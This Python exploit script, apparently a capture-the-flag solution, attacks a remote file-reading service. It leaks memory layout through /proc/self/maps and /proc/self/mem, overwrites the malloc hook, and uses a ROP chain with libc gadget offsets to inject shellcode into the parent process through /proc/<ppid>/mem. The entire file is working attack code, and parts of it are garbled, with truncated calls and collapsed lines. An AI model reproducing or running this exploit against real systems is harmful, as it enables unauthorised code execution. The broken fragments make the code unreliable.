import sys import phun def sendit(r,fn,seek=0,cnt=0,end=False,has_epi=True):'?\n') r.sendline('r')'?\n') r.sendline(fn)'?\n') r.sendline(str(seek))'?\n') r.sendline(str(cnt) if type(cnt) == int else cnt) if has_epi:'bytes\n') ret='quit') r.sendline('y' if end else 'n') return ret local = sys.argv[1] == '-l' if local: r = phun.Remote('localhost',1234) FD = 5 hook_off = 0x398ad0 rop0_off = 0x36a74 off_pop_rdx_rsi = 0xf5009 off_pop_r8 = 0x112476 off_pop_r14 = 0x1fbc9 off_pop_rax = 0x36018 off_pop_rcx = 0x2d753 off_pop_rbx = 0x29179 off_movr14_callebx = 0x21092 else: r = phun.Remote('',14000) FD = 3 hook_off = 0x3bdaf0 rop0_off = 0x3aa94 off_pop_rdx_rsi = 0x1115b9 off_pop_r8 = 0x131c06 off_pop_r14 = 0x229a4 off_pop_rax = 0x1d5f8 off_pop_rcx = 0x1a5298 off_pop_rbx = 0x2a369 off_movr14_callebx = 0x2172a ## get me some maps maps = sendit(r,'/proc/self/maps',cnt=9086) base = libc = heap = stack = ostack = None #print maps for line in maps.split("\n"): if '/libc' in line and not libc: libc = int(line.split('-')[0],16) elif '/chal' in line and not base: base = int(line.split('-')[0],16) elif '/tea' in line and not base: base = int(line.split('-')[0],16) elif '[heap]' in line and not heap: heap = int(line.split('-')[0],16) elif line.startswith('6f') and not stack: stack = int(line.split('-')[0],16) elif '0-3' in line and not stack: stack = int(line.split('-')[0],16) elif '[stack]' in line and not ostack: ostack = int(line.split('-')[0],16) print '[+] base',hex(base) print '[+] heap',hex(heap) print '[+] libc',hex(libc) print '[+] stack',hex(stack) data=sendit(r,'/proc/self/stat',cnt=32) data=data.split(' ') pid = int(data[0]) ppid = int(data[3]) print '[*] pid: %d ppid: %d' % (pid,ppid) a = ostack + 0x1f000 data = sendit(r,'/proc/self/mem',seek=a,cnt=0x4000) off=data.index(phun.p64(stack)) offset = phun.u64(data[off-0x20:off-0x20+8]) print '[+] random offset',hex(offset) stack_var = stack+offset-0x1000+4032 print '[+] stack_var',hex(stack_var) malloc_hook = libc + hook_off rop_begin = libc + rop0_off payload = ('9'.ljust(16,"\x00") + phun.p64(rop_begin)).ljust(0x30) payload += phun.p64(FD,malloc_hook) sendit(r,'/proc/self/mem',seek=stack_var,cnt=payload) sh ='x64') rop = phun.p64(*[ base + 0x24a3, 0xffFFffFF << 32 | 2,base + 0xaa0, base + 0x24a3, 0xffFFffFF << 32 | 3,base + 0xaa0, base + 0x24a3, stack_var + 0x100, libc + off_pop_rdx_rsi, 0, 2, base + 0xaf8, base + 0x24a3, 2, libc + off_pop_rdx_rsi, 0, base + 0xa60, base + 0xa98, base + 0x24a3, 2, libc + off_pop_rdx_rsi, len(sh), stack_var + 0x110, base + 0xA78, base + 0x1E4D ]).ljust(0x100,"\x90") + ('/proc/%d/mem' % ppid).ljust(16,"\x00") + sh fname = ('/proc/%d/mem'%ppid).ljust(52,"\x00") + phun.p64(2) payload = "128\x00" + "A"*12 + rop #mmap_rop() sendit(r,fname,seek=libc,cnt=payload,has_epi=False)